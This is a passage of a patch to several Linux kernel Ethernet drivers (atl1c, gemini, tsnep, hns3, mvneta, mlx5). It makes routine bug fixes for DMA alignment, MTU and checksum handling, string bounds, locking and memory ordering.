+-			adapter->rrd_ring[i].rx_page = NULL;
+-		}
+-	}
+ }
+ 
+ /**
+@@ -1764,48 +1752,11 @@ static inline void atl1c_rx_checksum(struct atl1c_adapter *adapter,
+ 	skb_checksum_none_assert(skb);
+ }
+ 
+-static struct sk_buff *atl1c_alloc_skb(struct atl1c_adapter *adapter,
+-				       u32 queue, bool napi_mode)
+-{
+-	struct atl1c_rrd_ring *rrd_ring = &adapter->rrd_ring[queue];
+-	struct sk_buff *skb;
+-	struct page *page;
+-
+-	if (adapter->rx_frag_size > PAGE_SIZE) {
+-		if (likely(napi_mode))
+-			return napi_alloc_skb(&rrd_ring->napi,
+-					      adapter->rx_buffer_len);
+-		else
+-			return netdev_alloc_skb_ip_align(adapter->netdev,
+-							 adapter->rx_buffer_len);
+-	}
+-
+-	page = rrd_ring->rx_page;
+-	if (!page) {
+-		page = alloc_page(GFP_ATOMIC);
+-		if (unlikely(!page))
+-			return NULL;
+-		rrd_ring->rx_page = page;
+-		rrd_ring->rx_page_offset = 0;
+-	}
+-
+-	skb = build_skb(page_address(page) + rrd_ring->rx_page_offset,
+-			adapter->rx_frag_size);
+-	if (likely(skb)) {
+-		skb_reserve(skb, NET_SKB_PAD + NET_IP_ALIGN);
+-		rrd_ring->rx_page_offset += adapter->rx_frag_size;
+-		if (rrd_ring->rx_page_offset >= PAGE_SIZE)
+-			rrd_ring->rx_page = NULL;
+-		else
+-			get_page(page);
+-	}
+-	return skb;
+-}
+-
+ static int atl1c_alloc_rx_buffer(struct atl1c_adapter *adapter, u32 queue,
+ 				 bool napi_mode)
+ {
+ 	struct atl1c_rfd_ring *rfd_ring = &adapter->rfd_ring[queue];
++	struct atl1c_rrd_ring *rrd_ring = &adapter->rrd_ring[queue];
+ 	struct pci_dev *pdev = adapter->pdev;
+ 	struct atl1c_buffer *buffer_info, *next_info;
+ 	struct sk_buff *skb;
+@@ -1824,13 +1775,27 @@ static int atl1c_alloc_rx_buffer(struct atl1c_adapter *adapter, u32 queue,
+ 	while (next_info->flags & ATL1C_BUFFER_FREE) {
+ 		rfd_desc = ATL1C_RFD_DESC(rfd_ring, rfd_next_to_use);
+ 
+-		skb = atl1c_alloc_skb(adapter, queue, napi_mode);
++		/* When DMA RX address is set to something like
++		 * 0x....fc0, it will be very likely to cause DMA
++		 * RFD overflow issue.
++		 *
++		 * To work around it, we apply rx skb with 64 bytes
++		 * longer space, and offset the address whenever
++		 * 0x....fc0 is detected.
++		 */
++		if (likely(napi_mode))
++			skb = napi_alloc_skb(&rrd_ring->napi, adapter->rx_buffer_len + 64);
++		else
++			skb = netdev_alloc_skb(adapter->netdev, adapter->rx_buffer_len + 64);
+ 		if (unlikely(!skb)) {
+ 			if (netif_msg_rx_err(adapter))
+ 				dev_warn(&pdev->dev, "alloc rx buffer failed\n");
+ 			break;
+ 		}
+ 
++		if (((unsigned long)skb->data & 0xfff) == 0xfc0)
++			skb_reserve(skb, 64);
++
+ 		/*
+ 		 * Make buffer alignment 2 beyond a 16 byte boundary
+ 		 * this will result in a 16 byte aligned IP header after
+diff --git a/drivers/net/ethernet/cortina/gemini.c b/drivers/net/ethernet/cortina/gemini.c
+index fdf10318758b4..7c0b0bc033c9c 100644
+--- a/drivers/net/ethernet/cortina/gemini.c
++++ b/drivers/net/ethernet/cortina/gemini.c
+@@ -432,8 +432,8 @@ static const struct gmac_max_framelen gmac_maxlens[] = {
+ 		.val = CONFIG0_MAXLEN_1536,
+ 	},
+ 	{
+-		.max_l3_len = 1542,
+-		.val = CONFIG0_MAXLEN_1542,
++		.max_l3_len = 1548,
++		.val = CONFIG0_MAXLEN_1548,
+ 	},
+ 	{
+ 		.max_l3_len = 9212,
+@@ -1145,6 +1145,7 @@ static int gmac_map_tx_bufs(struct net_device *netdev, struct sk_buff *skb,
+ 	dma_addr_t mapping;
+ 	unsigned short mtu;
+ 	void *buffer;
++	int ret;
+ 
+ 	mtu  = ETH_HLEN;
+ 	mtu += netdev->mtu;
+@@ -1159,9 +1160,30 @@ static int gmac_map_tx_bufs(struct net_device *netdev, struct sk_buff *skb,
+ 		word3 |= mtu;
+ 	}
+ 
+-	if (skb->ip_summed != CHECKSUM_NONE) {
++	if (skb->len >= ETH_FRAME_LEN) {
++		/* Hardware offloaded checksumming isn't working on frames
++		 * bigger than 1514 bytes. A hypothesis about this is that the
++		 * checksum buffer is only 1518 bytes, so when the frames get
++		 * bigger they get truncated, or the last few bytes get
++		 * overwritten by the FCS.
++		 *
++		 * Just use software checksumming and bypass on bigger frames.
++		 */
++		if (skb->ip_summed == CHECKSUM_PARTIAL) {
++			ret = skb_checksum_help(skb);
++			if (ret)
++				return ret;
++		}
++		word1 |= TSS_BYPASS_BIT;
++	} else if (skb->ip_summed == CHECKSUM_PARTIAL) {
+ 		int tcp = 0;
+ 
++		/* We do not switch off the checksumming on non TCP/UDP
++		 * frames: as is shown from tests, the checksumming engine
++		 * is smart enough to see that a frame is not actually TCP
++		 * or UDP and then just pass it through without any changes
++		 * to the frame.
++		 */
+ 		if (skb->protocol == htons(ETH_P_IP)) {
+ 			word1 |= TSS_IP_CHKSUM_BIT;
+ 			tcp = ip_hdr(skb)->protocol == IPPROTO_TCP;
+@@ -1978,15 +2000,6 @@ static int gmac_change_mtu(struct net_device *netdev, int new_mtu)
+ 	return 0;
+ }
+ 
+-static netdev_features_t gmac_fix_features(struct net_device *netdev,
+-					   netdev_features_t features)
+-{
+-	if (netdev->mtu + ETH_HLEN + VLAN_HLEN > MTU_SIZE_BIT_MASK)
+-		features &= ~GMAC_OFFLOAD_FEATURES;
+-
+-	return features;
+-}
+-
+ static int gmac_set_features(struct net_device *netdev,
+ 			     netdev_features_t features)
+ {
+@@ -2212,7 +2225,6 @@ static const struct net_device_ops gmac_351x_ops = {
+ 	.ndo_set_mac_address	= gmac_set_mac_address,
+ 	.ndo_get_stats64	= gmac_get_stats64,
+ 	.ndo_change_mtu		= gmac_change_mtu,
+-	.ndo_fix_features	= gmac_fix_features,
+ 	.ndo_set_features	= gmac_set_features,
+ };
+ 
+@@ -2464,11 +2476,12 @@ static int gemini_ethernet_port_probe(struct platform_device *pdev)
+ 
+ 	netdev->hw_features = GMAC_OFFLOAD_FEATURES;
+ 	netdev->features |= GMAC_OFFLOAD_FEATURES | NETIF_F_GRO;
+-	/* We can handle jumbo frames up to 10236 bytes so, let's accept
+-	 * payloads of 10236 bytes minus VLAN and ethernet header
++	/* We can receive jumbo frames up to 10236 bytes but only
++	 * transmit 2047 bytes so, let's accept payloads of 2047
++	 * bytes minus VLAN and ethernet header
+ 	 */
+ 	netdev->min_mtu = ETH_MIN_MTU;
+-	netdev->max_mtu = 10236 - VLAN_ETH_HLEN;
++	netdev->max_mtu = MTU_SIZE_BIT_MASK - VLAN_ETH_HLEN;
+ 
+ 	port->freeq_refill = 0;
+ 	netif_napi_add(netdev, &port->napi, gmac_napi_poll);
+diff --git a/drivers/net/ethernet/cortina/gemini.h b/drivers/net/ethernet/cortina/gemini.h
+index 9fdf77d5eb374..24bb989981f23 100644
+--- a/drivers/net/ethernet/cortina/gemini.h
++++ b/drivers/net/ethernet/cortina/gemini.h
+@@ -502,7 +502,7 @@ union gmac_txdesc_3 {
+ #define SOF_BIT			0x80000000
+ #define EOF_BIT			0x40000000
+ #define EOFIE_BIT		BIT(29)
+-#define MTU_SIZE_BIT_MASK	0x1fff
++#define MTU_SIZE_BIT_MASK	0x7ff /* Max MTU 2047 bytes */
+ 
+ /* GMAC Tx Descriptor */
+ struct gmac_txdesc {
+@@ -787,7 +787,7 @@ union gmac_config0 {
+ #define  CONFIG0_MAXLEN_1536	0
+ #define  CONFIG0_MAXLEN_1518	1
+ #define  CONFIG0_MAXLEN_1522	2
+-#define  CONFIG0_MAXLEN_1542	3
++#define  CONFIG0_MAXLEN_1548	3
+ #define  CONFIG0_MAXLEN_9k	4	/* 9212 */
+ #define  CONFIG0_MAXLEN_10k	5	/* 10236 */
+ #define  CONFIG0_MAXLEN_1518__6	6
+diff --git a/drivers/net/ethernet/engleder/tsnep.h b/drivers/net/ethernet/engleder/tsnep.h
+index 09a723b827c77..0a0d3d7ba63b3 100644
+--- a/drivers/net/ethernet/engleder/tsnep.h
++++ b/drivers/net/ethernet/engleder/tsnep.h
+@@ -123,7 +123,7 @@ struct tsnep_rx {
+ 
+ struct tsnep_queue {
+ 	struct tsnep_adapter *adapter;
+-	char name[IFNAMSIZ + 9];
++	char name[IFNAMSIZ + 16];
+ 
+ 	struct tsnep_tx *tx;
+ 	struct tsnep_rx *rx;
+diff --git a/drivers/net/ethernet/engleder/tsnep_main.c b/drivers/net/ethernet/engleder/tsnep_main.c
+index 2be518db04270..c86dfbce787f1 100644
+--- a/drivers/net/ethernet/engleder/tsnep_main.c
++++ b/drivers/net/ethernet/engleder/tsnep_main.c
+@@ -973,14 +973,14 @@ static int tsnep_request_irq(struct tsnep_queue *queue, bool first)
+ 		dev = queue->adapter;
+ 	} else {
+ 		if (queue->tx && queue->rx)
+-			sprintf(queue->name, "%s-txrx-%d", name,
+-				queue->rx->queue_index);
++			snprintf(queue->name, sizeof(queue->name), "%s-txrx-%d",
++				 name, queue->rx->queue_index);
+ 		else if (queue->tx)
+-			sprintf(queue->name, "%s-tx-%d", name,
+-				queue->tx->queue_index);
++			snprintf(queue->name, sizeof(queue->name), "%s-tx-%d",
++				 name, queue->tx->queue_index);
+ 		else
+-			sprintf(queue->name, "%s-rx-%d", name,
+-				queue->rx->queue_index);
++			snprintf(queue->name, sizeof(queue->name), "%s-rx-%d",
++				 name, queue->rx->queue_index);
+ 		handler = tsnep_irq_txrx;
+ 		dev = queue;
+ 	}
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+index 00eed9835cb55..d2603cfc122c8 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+@@ -494,11 +494,14 @@ static void hns3_get_coal_info(struct hns3_enet_tqp_vector *tqp_vector,
+ 	}
+ 
+ 	sprintf(result[j++], "%d", i);
+-	sprintf(result[j++], "%s", dim_state_str[dim->state]);
++	sprintf(result[j++], "%s", dim->state < ARRAY_SIZE(dim_state_str) ?
++		dim_state_str[dim->state] : "unknown");
+ 	sprintf(result[j++], "%u", dim->profile_ix);
+-	sprintf(result[j++], "%s", dim_cqe_mode_str[dim->mode]);
++	sprintf(result[j++], "%s", dim->mode < ARRAY_SIZE(dim_cqe_mode_str) ?
++		dim_cqe_mode_str[dim->mode] : "unknown");
+ 	sprintf(result[j++], "%s",
+-		dim_tune_stat_str[dim->tune_state]);
++		dim->tune_state < ARRAY_SIZE(dim_tune_stat_str) ?
++		dim_tune_stat_str[dim->tune_state] : "unknown");
+ 	sprintf(result[j++], "%u", dim->steps_left);
+ 	sprintf(result[j++], "%u", dim->steps_right);
+ 	sprintf(result[j++], "%u", dim->tired);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 04c9baca1b0f8..5ad22b815b2f0 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -5139,7 +5139,7 @@ static int hns3_init_mac_addr(struct net_device *netdev)
+ 	struct hns3_nic_priv *priv = netdev_priv(netdev);
+ 	char format_mac_addr[HNAE3_FORMAT_MAC_ADDR_LEN];
+ 	struct hnae3_handle *h = priv->ae_handle;
+-	u8 mac_addr_temp[ETH_ALEN];
++	u8 mac_addr_temp[ETH_ALEN] = {0};
+ 	int ret = 0;
+ 
+ 	if (h->ae_algo->ops->get_mac_addr)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 3e1d202d60ce1..48b0cb5ec5d29 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -74,6 +74,7 @@ static void hclge_sync_fd_table(struct hclge_dev *hdev);
+ static void hclge_update_fec_stats(struct hclge_dev *hdev);
+ static int hclge_mac_link_status_wait(struct hclge_dev *hdev, int link_ret,
+ 				      int wait_cnt);
++static int hclge_update_port_info(struct hclge_dev *hdev);
+ 
+ static struct hnae3_ae_algo ae_algo;
+ 
+@@ -3141,6 +3142,9 @@ static void hclge_update_link_status(struct hclge_dev *hdev)
+ 
+ 	if (state != hdev->hw.mac.link) {
+ 		hdev->hw.mac.link = state;
++		if (state == HCLGE_LINK_STATUS_UP)
++			hclge_update_port_info(hdev);
++
+ 		client->ops->link_status_change(handle, state);
+ 		hclge_config_mac_tnl_int(hdev, state);
+ 		if (rclient && rclient->ops->link_status_change)
+@@ -10132,8 +10136,6 @@ static void hclge_rm_vport_vlan_table(struct hclge_vport *vport, u16 vlan_id,
+ 	struct hclge_vport_vlan_cfg *vlan, *tmp;
+ 	struct hclge_dev *hdev = vport->back;
+ 
+-	mutex_lock(&hdev->vport_lock);
+-
+ 	list_for_each_entry_safe(vlan, tmp, &vport->vlan_list, node) {
+ 		if (vlan->vlan_id == vlan_id) {
+ 			if (is_write_tbl && vlan->hd_tbl_status)
+@@ -10148,8 +10150,6 @@ static void hclge_rm_vport_vlan_table(struct hclge_vport *vport, u16 vlan_id,
+ 			break;
+ 		}
+ 	}
+-
+-	mutex_unlock(&hdev->vport_lock);
+ }
+ 
+ void hclge_rm_vport_all_vlan_table(struct hclge_vport *vport, bool is_del_list)
+@@ -10558,11 +10558,16 @@ int hclge_set_vlan_filter(struct hnae3_handle *handle, __be16 proto,
+ 	 * handle mailbox. Just record the vlan id, and remove it after
+ 	 * reset finished.
+ 	 */
++	mutex_lock(&hdev->vport_lock);
+ 	if ((test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state) ||
+ 	     test_bit(HCLGE_STATE_RST_FAIL, &hdev->state)) && is_kill) {
+ 		set_bit(vlan_id, vport->vlan_del_fail_bmap);
++		mutex_unlock(&hdev->vport_lock);
+ 		return -EBUSY;
++	} else if (!is_kill && test_bit(vlan_id, vport->vlan_del_fail_bmap)) {
++		clear_bit(vlan_id, vport->vlan_del_fail_bmap);
+ 	}
++	mutex_unlock(&hdev->vport_lock);
+ 
+ 	/* when port base vlan enabled, we use port base vlan as the vlan
+ 	 * filter entry. In this case, we don't update vlan filter table
+@@ -10577,17 +10582,22 @@ int hclge_set_vlan_filter(struct hnae3_handle *handle, __be16 proto,
+ 	}
+ 
+ 	if (!ret) {
+-		if (!is_kill)
++		if (!is_kill) {
+ 			hclge_add_vport_vlan_table(vport, vlan_id,
+ 						   writen_to_tbl);
+-		else if (is_kill && vlan_id != 0)
++		} else if (is_kill && vlan_id != 0) {
++			mutex_lock(&hdev->vport_lock);
+ 			hclge_rm_vport_vlan_table(vport, vlan_id, false);
++			mutex_unlock(&hdev->vport_lock);
++		}
+ 	} else if (is_kill) {
+ 		/* when remove hw vlan filter failed, record the vlan id,
+ 		 * and try to remove it from hw later, to be consistence
+ 		 * with stack
+ 		 */
++		mutex_lock(&hdev->vport_lock);
+ 		set_bit(vlan_id, vport->vlan_del_fail_bmap);
++		mutex_unlock(&hdev->vport_lock);
+ 	}
+ 
+ 	hclge_set_vport_vlan_fltr_change(vport);
+@@ -10627,6 +10637,7 @@ static void hclge_sync_vlan_filter(struct hclge_dev *hdev)
+ 	int i, ret, sync_cnt = 0;
+ 	u16 vlan_id;
+ 
++	mutex_lock(&hdev->vport_lock);
+ 	/* start from vport 1 for PF is always alive */
+ 	for (i = 0; i < hdev->num_alloc_vport; i++) {
+ 		struct hclge_vport *vport = &hdev->vport[i];
+@@ -10637,21 +10648,26 @@ static void hclge_sync_vlan_filter(struct hclge_dev *hdev)
+ 			ret = hclge_set_vlan_filter_hw(hdev, htons(ETH_P_8021Q),
+ 						       vport->vport_id, vlan_id,
+ 						       true);
+-			if (ret && ret != -EINVAL)
++			if (ret && ret != -EINVAL) {
++				mutex_unlock(&hdev->vport_lock);
+ 				return;
++			}
+ 
+ 			clear_bit(vlan_id, vport->vlan_del_fail_bmap);
+ 			hclge_rm_vport_vlan_table(vport, vlan_id, false);
+ 			hclge_set_vport_vlan_fltr_change(vport);
+ 
+ 			sync_cnt++;
+-			if (sync_cnt >= HCLGE_MAX_SYNC_COUNT)
++			if (sync_cnt >= HCLGE_MAX_SYNC_COUNT) {
++				mutex_unlock(&hdev->vport_lock);
+ 				return;
++			}
+ 
+ 			vlan_id = find_first_bit(vport->vlan_del_fail_bmap,
+ 						 VLAN_N_VID);
+ 		}
+ 	}
++	mutex_unlock(&hdev->vport_lock);
+ 
+ 	hclge_sync_vlan_fltr_state(hdev);
+ }
+@@ -11642,6 +11658,7 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 		goto err_msi_irq_uninit;
+ 
+ 	if (hdev->hw.mac.media_type == HNAE3_MEDIA_TYPE_COPPER) {
++		clear_bit(HNAE3_DEV_SUPPORT_FEC_B, ae_dev->caps);
+ 		if (hnae3_dev_phy_imp_supported(hdev))
+ 			ret = hclge_update_tp_port_info(hdev);
+ 		else
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index 72cf5145e15a2..5a978ea101a90 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -1258,6 +1258,8 @@ static int hclgevf_set_vlan_filter(struct hnae3_handle *handle,
+ 	     test_bit(HCLGEVF_STATE_RST_FAIL, &hdev->state)) && is_kill) {
+ 		set_bit(vlan_id, hdev->vlan_del_fail_bmap);
+ 		return -EBUSY;
++	} else if (!is_kill && test_bit(vlan_id, hdev->vlan_del_fail_bmap)) {
++		clear_bit(vlan_id, hdev->vlan_del_fail_bmap);
+ 	}
+ 
+ 	hclgevf_build_send_msg(&send_msg, HCLGE_MBX_SET_VLAN,
+@@ -1285,20 +1287,25 @@ static void hclgevf_sync_vlan_filter(struct hclgevf_dev *hdev)
+ 	int ret, sync_cnt = 0;
+ 	u16 vlan_id;
+ 
++	if (bitmap_empty(hdev->vlan_del_fail_bmap, VLAN_N_VID))
++		return;
++
++	rtnl_lock();
+ 	vlan_id = find_first_bit(hdev->vlan_del_fail_bmap, VLAN_N_VID);
+ 	while (vlan_id != VLAN_N_VID) {
+ 		ret = hclgevf_set_vlan_filter(handle, htons(ETH_P_8021Q),
+ 					      vlan_id, true);
+ 		if (ret)
+-			return;
++			break;
+ 
+ 		clear_bit(vlan_id, hdev->vlan_del_fail_bmap);
+ 		sync_cnt++;
+ 		if (sync_cnt >= HCLGEVF_MAX_SYNC_COUNT)
+-			return;
++			break;
+ 
+ 		vlan_id = find_first_bit(hdev->vlan_del_fail_bmap, VLAN_N_VID);
+ 	}
++	rtnl_unlock();
+ }
+ 
+ static int hclgevf_en_hw_strip_rxvtag(struct hnae3_handle *handle, bool enable)
+@@ -2028,8 +2035,18 @@ static enum hclgevf_evt_cause hclgevf_check_evt_cause(struct hclgevf_dev *hdev,
+ 	return HCLGEVF_VECTOR0_EVENT_OTHER;
+ }
+ 
++static void hclgevf_reset_timer(struct timer_list *t)
++{
++	struct hclgevf_dev *hdev = from_timer(hdev, t, reset_timer);
++
++	hclgevf_clear_event_cause(hdev, HCLGEVF_VECTOR0_EVENT_RST);
++	hclgevf_reset_task_schedule(hdev);
++}
++
+ static irqreturn_t hclgevf_misc_irq_handle(int irq, void *data)
+ {
++#define HCLGEVF_RESET_DELAY	5
++
+ 	enum hclgevf_evt_cause event_cause;
+ 	struct hclgevf_dev *hdev = data;
+ 	u32 clearval;
+@@ -2041,7 +2058,8 @@ static irqreturn_t hclgevf_misc_irq_handle(int irq, void *data)
+ 
+ 	switch (event_cause) {
+ 	case HCLGEVF_VECTOR0_EVENT_RST:
+-		hclgevf_reset_task_schedule(hdev);
++		mod_timer(&hdev->reset_timer,
++			  jiffies + msecs_to_jiffies(HCLGEVF_RESET_DELAY));
+ 		break;
+ 	case HCLGEVF_VECTOR0_EVENT_MBX:
+ 		hclgevf_mbx_handler(hdev);
+@@ -2987,6 +3005,7 @@ static int hclgevf_init_hdev(struct hclgevf_dev *hdev)
+ 		 HCLGEVF_DRIVER_NAME);
+ 
+ 	hclgevf_task_schedule(hdev, round_jiffies_relative(HZ));
++	timer_setup(&hdev->reset_timer, hclgevf_reset_timer, 0);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
+index 59ca6c794d6db..d65ace07b4569 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
+@@ -219,6 +219,7 @@ struct hclgevf_dev {
+ 	enum hnae3_reset_type reset_level;
+ 	unsigned long reset_pending;
+ 	enum hnae3_reset_type reset_type;
++	struct timer_list reset_timer;
+ 
+ #define HCLGEVF_RESET_REQUESTED		0
+ #define HCLGEVF_RESET_PENDING		1
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_mbx.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_mbx.c
+index bbf7b14079de3..85c2a634c8f96 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_mbx.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_mbx.c
+@@ -63,6 +63,9 @@ static int hclgevf_get_mbx_resp(struct hclgevf_dev *hdev, u16 code0, u16 code1,
+ 		i++;
+ 	}
+ 
++	/* ensure additional_info will be seen after received_resp */
++	smp_rmb();
++
+ 	if (i >= HCLGEVF_MAX_TRY_TIMES) {
+ 		dev_err(&hdev->pdev->dev,
+ 			"VF could not get mbx(%u,%u) resp(=%d) from PF in %d tries\n",
+@@ -178,6 +181,10 @@ static void hclgevf_handle_mbx_response(struct hclgevf_dev *hdev,
+ 	resp->resp_status = hclgevf_resp_to_errno(resp_status);
+ 	memcpy(resp->additional_info, req->msg.resp_data,
+ 	       HCLGE_MBX_MAX_RESP_DATA_SIZE * sizeof(u8));
++
++	/* ensure additional_info will be seen before setting received_resp */
++	smp_wmb();
++
+ 	if (match_id) {
+ 		/* If match_id is not zero, it means PF support match_id.
+ 		 * if the match_id is right, VF get the right response, or
+diff --git a/drivers/net/ethernet/marvell/mvneta.c b/drivers/net/ethernet/marvell/mvneta.c
+index aca5b72cfeec6..eb4ebaa1c92ff 100644
+--- a/drivers/net/ethernet/marvell/mvneta.c
++++ b/drivers/net/ethernet/marvell/mvneta.c
+@@ -4730,14 +4730,17 @@ static void mvneta_ethtool_get_strings(struct net_device *netdev, u32 sset,
+ 				       u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS) {
++		struct mvneta_port *pp = netdev_priv(netdev);
+ 		int i;
+ 
+ 		for (i = 0; i < ARRAY_SIZE(mvneta_statistics); i++)
+ 			memcpy(data + i * ETH_GSTRING_LEN,
+ 			       mvneta_statistics[i].name, ETH_GSTRING_LEN);
+ 
+-		data += ETH_GSTRING_LEN * ARRAY_SIZE(mvneta_statistics);
+-		page_pool_ethtool_stats_get_strings(data);
++		if (!pp->bm_priv) {
++			data += ETH_GSTRING_LEN * ARRAY_SIZE(mvneta_statistics);
++			page_pool_ethtool_stats_get_strings(data);
++		}
+ 	}
+ }
+ 
+@@ -4855,8 +4858,10 @@ static void mvneta_ethtool_pp_stats(struct mvneta_port *pp, u64 *data)
+ 	struct page_pool_stats stats = {};
+ 	int i;
+ 
+-	for (i = 0; i < rxq_number; i++)
+-		page_pool_get_stats(pp->rxqs[i].page_pool, &stats);
++	for (i = 0; i < rxq_number; i++) {
++		if (pp->rxqs[i].page_pool)
++			page_pool_get_stats(pp->rxqs[i].page_pool, &stats);
++	}
+ 
+ 	page_pool_ethtool_stats_get(data, &stats);
+ }
+@@ -4872,14 +4877,21 @@ static void mvneta_ethtool_get_stats(struct net_device *dev,
+ 	for (i = 0; i < ARRAY_SIZE(mvneta_statistics); i++)
+ 		*data++ = pp->ethtool_stats[i];
+ 
+-	mvneta_ethtool_pp_stats(pp, data);
++	if (!pp->bm_priv)
++		mvneta_ethtool_pp_stats(pp, data);
+ }
+ 
+ static int mvneta_ethtool_get_sset_count(struct net_device *dev, int sset)
+ {
+-	if (sset == ETH_SS_STATS)
+-		return ARRAY_SIZE(mvneta_statistics) +
+-		       page_pool_ethtool_stats_get_count();
++	if (sset == ETH_SS_STATS) {
++		int count = ARRAY_SIZE(mvneta_statistics);
++		struct mvneta_port *pp = netdev_priv(dev);
++
++		if (!pp->bm_priv)
++			count += page_pool_ethtool_stats_get_count();
++
++		return count;
++	}
+ 
+ 	return -EOPNOTSUPP;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
+index 1ae15b8536a85..9b1f1369ac4d8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
+@@ -668,11 +668,11 @@ static int mlx5e_rx_reporter_dump(struct devlink_health_reporter *reporter,
+ 
+ void mlx5e_reporter_rx_timeout(struct mlx5e_rq *rq)
+ {
+-	char icosq_str[MLX5E_REPORTER_PER_Q_MAX_LEN] = {};
+ 	char err_str[MLX5E_REPORTER_PER_Q_MAX_LEN];
+ 	struct mlx5e_icosq *icosq = rq->icosq;
+ 	struct mlx5e_priv *priv = rq->priv;
+ 	struct mlx5e_err_ctx err_ctx = {};
++	char icosq_str[32] = {};
+ 
+ 	err_ctx.ctx = rq;
+ 	err_ctx.recover = mlx5e_rx_reporter_timeout_recover;
+@@ -681,7 +681,7 @@ void mlx5e_reporter_rx_timeout(struct mlx5e_rq *rq)
+ 	if (icosq)
+ 		snprintf(icosq_str, sizeof(icosq_str), "ICOSQ: 0x%x, ", icosq->sqn);
+ 	snprintf(err_str, sizeof(err_str),
+-		 "RX timeout on channel: %d, %sRQ: 0x%x, CQ: 0x%x",
++		 "RX timeout on channel: %d, %s RQ: 0x%x, CQ: 0x%x",
+ 		 rq->ix, icosq_str, rq->rqn, rq->cq.mcq.cqn);
+ 
+ 	mlx5e_health_report(priv, priv->rx_reporter, err_str, &err_ctx);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+index 83bb0811e7741..4db0483c066a8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+@@ -300,9 +300,6 @@ int mlx5e_tc_tun_create_header_ipv4(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto destroy_neigh_entry;
+ 
+-	e->encap_size = ipv4_encap_size;
+-	e->encap_header = encap_header;
+-
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+@@ -322,6 +319,8 @@ int mlx5e_tc_tun_create_header_ipv4(struct mlx5e_priv *priv,
+ 		goto destroy_neigh_entry;
+ 	}
+ 
++	e->encap_size = ipv4_encap_size;
++	e->encap_header = encap_header;
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv4_put(&attr);
+@@ -404,16 +403,12 @@ int mlx5e_tc_tun_update_header_ipv4(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto free_encap;
+ 
+-	e->encap_size = ipv4_encap_size;
+-	kfree(e->encap_header);
+-	e->encap_header = encap_header;
+-
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+ 		 * and not used before that.
+ 		 */
+-		goto release_neigh;
++		goto free_encap;
+ 	}
+ 
+ 	memset(&reformat_params, 0, sizeof(reformat_params));
+@@ -427,6 +422,10 @@ int mlx5e_tc_tun_update_header_ipv4(struct mlx5e_priv *priv,
+ 		goto free_encap;
+ 	}
+ 
++	e->encap_size = ipv4_encap_size;
++	kfree(e->encap_header);
++	e->encap_header = encap_header;
++
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv4_put(&attr);
+@@ -568,9 +567,6 @@ int mlx5e_tc_tun_create_header_ipv6(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto destroy_neigh_entry;
+ 
+-	e->encap_size = ipv6_encap_size;
+-	e->encap_header = encap_header;
+-
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+@@ -590,6 +586,8 @@ int mlx5e_tc_tun_create_header_ipv6(struct mlx5e_priv *priv,
+ 		goto destroy_neigh_entry;
+ 	}
+ 
++	e->encap_size = ipv6_encap_size;
++	e->encap_header = encap_header;
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv6_put(&attr);
